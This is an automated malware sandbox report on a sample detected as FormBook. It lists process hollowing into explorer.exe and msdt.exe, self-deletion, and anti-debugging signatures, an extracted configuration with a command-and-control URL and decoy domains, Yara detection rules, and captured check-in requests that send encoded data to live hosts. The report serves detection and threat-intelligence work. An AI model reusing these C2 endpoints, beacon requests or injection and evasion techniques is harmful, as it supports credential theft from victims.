Analysis Report cryptedprof.exe

Overview

General Information

Sample Name: cryptedprof.exe
Analysis ID: 356722
MD5: 72efe20e4a59ae2722383b8786956994
SHA1: 453b2af3b318668926087556eebfa93eda75d2df
SHA256: d8e0edf1cca3b6edefcd830e233131c593997b5bd4454891dc1b70614862f718
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • cryptedprof.exe (PID: 6980 cmdline: 'C:\Users\user\Desktop\cryptedprof.exe' MD5: 72EFE20E4A59AE2722383B8786956994)
    • cryptedprof.exe (PID: 7064 cmdline: 'C:\Users\user\Desktop\cryptedprof.exe' MD5: 72EFE20E4A59AE2722383B8786956994)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msdt.exe (PID: 984 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
          • cmd.exe (PID: 6592 cmdline: /c del 'C:\Users\user\Desktop\cryptedprof.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.warungsuntik.com/rcv/"], "decoy": ["dorlandoconstruction.com", "houswifekelly.com", "thunderprnet.com", "licipo.com", "ecocotte.com", "xt.show", "sneakerbyhailss.com", "xn--xcke3b8f283o9jzd.com", "1915dobbindr.com", "njbroncosfootball.com", "xn--missrosmakeup-vhb.com", "poertz.com", "20gb-internett-hediye.com", "legalprotech.com", "smarttechnetworks.com", "jamusedwards.com", "smartsettleinfinity.com", "dizesh.com", "gnoccho.com", "historyzapper.com", "sdponcologypatientaid.com", "tabandolano.online", "iveysmotorlodgeme.com", "e-market88.com", "carpetlaunch.com", "creativeladder.net", "bjhysz.com", "befton.ovh", "kehadiransiswa.online", "trunglet.com", "warrenswelding.online", "sculptedspa.com", "avalon78m.online", "diverseworker.com", "sounongwang.com", "sanaugustinegardenresort.com", "active-trinity.com", "thatlocaljawn.com", "myadamandsteve.com", "yourbestpprazdnik.club", "pop2.online", "gavinlurssen.com", "everybodywantstobfamous.com", "shegimx.com", "qbluebaypanowdbuy.com", "peatedbrandy.online", "weightsandweed.com", "remotepowers.com", "yangguangdiannao.com", "ruecedu.com", "honeybadgerpodcast.com", "ivario.cloud", "indeep-events.com", "luzshoesr.online", "lanskyee.com", "chinalsgroup.com", "divanna-box.site", "reginajewerlyco.com", "voshtravels.com", "isahil.tech", "smartloanbuilder.net", "dojosinaptico.com", "finik.clinic", "columbus-luxury-hotels.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      3.2.cryptedprof.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        3.2.cryptedprof.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.cryptedprof.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x18409:$sqlite3step: 68 34 1C 7B E1
        • 0x1851c:$sqlite3step: 68 34 1C 7B E1
        • 0x18438:$sqlite3text: 68 38 2A 90 C5
        • 0x1855d:$sqlite3text: 68 38 2A 90 C5
        • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
        1.2.cryptedprof.exe.2a60000.5.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          1.2.cryptedprof.exe.2a60000.5.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          AV Detection:

          Found malware configuration
          Source: 3.2.cryptedprof.exe.400000.0.raw.unpack, Malware Configuration Extractor: FormBook
          Multi AV Scanner detection for submitted file
          Source: cryptedprof.exe, ReversingLabs: Detection: 27%
          Yara detected FormBook
          Source: Yara match, File source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.335904498.0000000002A60000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.388332854.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.388307234.00000000009C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000007.00000002.590578068.00000000003D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 3.2.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.cryptedprof.exe.2a60000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.1.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.2.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.cryptedprof.exe.2a60000.5.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.1.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sample
          Source: cryptedprof.exe, Joe Sandbox ML: detected
          Source: 3.1.cryptedprof.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.2.cryptedprof.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.cryptedprof.exe.2a60000.5.unpack, Avira: Label: TR/Crypt.ZPACK.Gen

          Compliance:

          Uses 32bit PE files
          Source: cryptedprof.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Contains modern PE file flags such as dynamic base (ASLR) or NX
          Source: cryptedprof.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Binary contains paths to debug symbols
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.354086786.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: msdt.pdbGCTL source: cryptedprof.exe, 00000003.00000002.389071974.0000000002830000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: cryptedprof.exe, 00000001.00000003.334189202.0000000002C50000.00000004.00000001.sdmp, cryptedprof.exe, 00000003.00000002.388641562.0000000000BAF000.00000040.00000001.sdmp, msdt.exe, 00000007.00000002.592508394.000000000478F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: cryptedprof.exe, msdt.exe
          Source: Binary string: msdt.pdb source: cryptedprof.exe, 00000003.00000002.389071974.0000000002830000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.354086786.000000000DC20000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\cryptedprof.exe, Code function: 1_2_00405A15 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose
          Source: C:\Users\user\Desktop\cryptedprof.exe, Code function: 1_2_004065C1 FindFirstFileA,FindClose
          Source: C:\Users\user\Desktop\cryptedprof.exe, Code function: 1_2_004027A1 FindFirstFileA
          Source: C:\Users\user\Desktop\cryptedprof.exe, Code function: 4x nop then pop ebx, 3_2_00407AFA
          Source: C:\Windows\SysWOW64\msdt.exe, Code function: 4x nop then pop ebx, 7_2_02C67AFB

          Networking:

          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
          Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49746 -> 34.102.136.180:80
          Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49746 -> 34.102.136.180:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49746 -> 34.102.136.180:80
          Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 111.221.46.49:80
          Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 111.221.46.49:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 111.221.46.49:80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractor, URLs: www.warungsuntik.com/rcv/
          Source: global traffic, HTTP traffic detected: GET /rcv/?VRNh=cg6bZkxEcNPMAIRmM8GPonkuA9GKh0BFEGdQJ3UU0rDFwE5vgU0uCiOyxYirtUdr8QJdvBkiGw==&jL08l2=WXL00450GFoHk HTTP/1.1, Host: www.thatlocaljawn.com, Connection: close
          Source: global traffic, HTTP traffic detected: GET /rcv/?VRNh=pIfKS/hEN6BRYAYnpceiijGTuCPe5XtNGOPRhmV5L9BR4RtlzZsfp+6kyczwPilyRouSrFb70A==&jL08l2=WXL00450GFoHk HTTP/1.1, Host: www.warungsuntik.com, Connection: close
          Source: global traffic, HTTP traffic detected: GET /rcv/?VRNh=Csk4gi0A2teOHchNxlHmfk3sZkNUWHShkT6DsNvEbOeCI6G9DGd1jjRyJ2sIZ3rQDjWWzUwybw==&jL08l2=WXL00450GFoHk HTTP/1.1, Host: www.tabandolano.online, Connection: close
          Source: Joe Sandbox View, IP Address: 34.102.136.180
          Source: Joe Sandbox View, ASN Name: GOOGLEUS
          Source: Joe Sandbox View, ASN Name: CLAYERLIMITED-AS-APClayerLimitedHK
          Source: unknown, DNS traffic detected: queries for: www.thatlocaljawn.com
          Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found, Server: nginx, Date: Tue, 23 Feb 2021 14:32:22 GMT, Content-Type: text/html, Content-Length: 479, Connection: close, ETag: "601d0d01-1df"
          Source: cryptedprof.exe, String found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: cryptedprof.exe, String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: msdt.exe, 00000007.00000002.594068714.000000000508F000.00000004.00000001.sdmp, String found in binary or memory: http://www.tabandolano.online/cgi-sys/suspendedpage.cgi?VRNh=Csk4gi0A2teOHchNxlHmfk3sZkNUWHShkT6DsNv
          Source: C:\Users\user\Desktop\cryptedprof.exe, Code function: 1_2_004054B2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match, File source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.335904498.0000000002A60000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.388332854.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.388307234.00000000009C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000007.00000002.590578068.00000000003D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 3.2.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.cryptedprof.exe.2a60000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.1.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.2.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.cryptedprof.exe.2a60000.5.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.1.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.335904498.0000000002A60000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.335904498.0000000002A60000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.388332854.00000000009F0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.388332854.00000000009F0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.388307234.00000000009C0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.388307234.00000000009C0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.590578068.00000000003D0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.590578068.00000000003D0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 3.2.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 1.2.cryptedprof.exe.2a60000.5.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.cryptedprof.exe.2a60000.5.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 3.1.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.1.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 3.2.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 1.2.cryptedprof.exe.2a60000.5.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.cryptedprof.exe.2a60000.5.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 3.1.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.1.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\cryptedprof.exe, Code function: 3_2_00419D60 NtCreateFile
          Source: C:\Users\user\Desktop\cryptedprof.exe, Code function: 3_2_00419E10 NtReadFile
          Source: C:\Users\user\Desktop\cryptedprof.exe, Code function: 3_2_00419E90 NtClose
          Source: C:\Users\user\Desktop\cryptedprof.exe, Code function: 3_2_00419F40 NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\cryptedprof.exe, Code function: 3_2_00419D5A NtCreateFile
          Source: C:\Users\user\Desktop\cryptedprof.exe, Code function: 3_2_00419DB4 NtReadFile
          Source: C:\Users\user\Desktop\cryptedprof.exe, Code function: 3_2_00419E8A NtClose
          Source: C:\Users\user\Desktop\cryptedprof.exe, Code function: 3_2_00419F3C NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\cryptedprof.exe, Code function: 3_2_00AF98F0 NtReadVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\cryptedprof.exe, Code function: 3_2_00AF9860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Users\user\Desktop\cryptedprof.exe, Code function: 3_2_00AF9840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Users\user\Desktop\cryptedprof.exe, Code function: 3_2_00AF99A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\cryptedprof.exe, Code function: 3_2_00AF9910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Users\user\Desktop\cryptedprof.exe, Code function: 3_2_00AF9A20 NtResumeThread,LdrInitializeThunk
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9A00 NtProtectVirtualMemory,LdrInitializeThunk,3_2_00AF9A00
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9A50 NtCreateFile,LdrInitializeThunk,3_2_00AF9A50
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF95D0 NtClose,LdrInitializeThunk,3_2_00AF95D0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9540 NtReadFile,LdrInitializeThunk,3_2_00AF9540
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF96E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_00AF96E0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_00AF9660
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF97A0 NtUnmapViewOfSection,LdrInitializeThunk,3_2_00AF97A0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9780 NtMapViewOfSection,LdrInitializeThunk,3_2_00AF9780
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9710 NtQueryInformationToken,LdrInitializeThunk,3_2_00AF9710
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF98A0 NtWriteVirtualMemory,3_2_00AF98A0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9820 NtEnumerateKey,3_2_00AF9820
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AFB040 NtSuspendThread,3_2_00AFB040
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF99D0 NtCreateProcessEx,3_2_00AF99D0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9950 NtQueueApcThread,3_2_00AF9950
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9A80 NtOpenDirectoryObject,3_2_00AF9A80
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9A10 NtQuerySection,3_2_00AF9A10
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AFA3B0 NtGetContextThread,3_2_00AFA3B0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9B00 NtSetValueKey,3_2_00AF9B00
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF95F0 NtQueryInformationFile,3_2_00AF95F0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9520 NtWaitForSingleObject,3_2_00AF9520
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AFAD30 NtSetContextThread,3_2_00AFAD30
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9560 NtWriteFile,3_2_00AF9560
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF96D0 NtCreateKey,3_2_00AF96D0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9610 NtEnumerateValueKey,3_2_00AF9610
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9670 NtQueryInformationProcess,3_2_00AF9670
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9650 NtQueryValueKey,3_2_00AF9650
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9860 NtQuerySystemInformation,LdrInitializeThunk,7_2_046D9860
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9840 NtDelayExecution,LdrInitializeThunk,7_2_046D9840
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9540 NtReadFile,LdrInitializeThunk,7_2_046D9540
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_046D9910
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D95D0 NtClose,LdrInitializeThunk,7_2_046D95D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D99A0 NtCreateSection,LdrInitializeThunk,7_2_046D99A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9660 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_046D9660
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9A50 NtCreateFile,LdrInitializeThunk,7_2_046D9A50
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9650 NtQueryValueKey,LdrInitializeThunk,7_2_046D9650
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D96E0 NtFreeVirtualMemory,LdrInitializeThunk,7_2_046D96E0
